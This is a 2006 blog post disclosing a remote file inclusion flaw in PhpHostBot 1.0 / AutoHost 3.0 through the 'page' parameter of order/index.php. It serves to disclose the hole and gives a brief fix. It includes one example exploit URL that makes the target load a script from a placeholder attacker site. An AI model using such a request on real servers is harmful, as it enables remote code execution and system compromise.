by r0t,der4444,cembo,VietMafia

Thursday, July 20, 2006

PhpHostBot remote File Inclusion Vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 july 2006
vendor:www.idevspot.com/PhpHostBot.php
affected versions:PhpHostBot 1.0 / AutoHost 3.0
###############################################

Vulnerability Description:

PhpHostBot contains a flaw that allows a remote file inclusion,which can be exploited by malicious people to compromise a vulnerable system.
User input passed to the "page" parameter in "order/index.php" isn't properly verified before being used to include files. This can be exploited to include scripts from external resources by passing an URL to a remote site.

example:

http://[victim]/order/index.php?page=http://[malicious_site]/file

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

0 Comments:

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew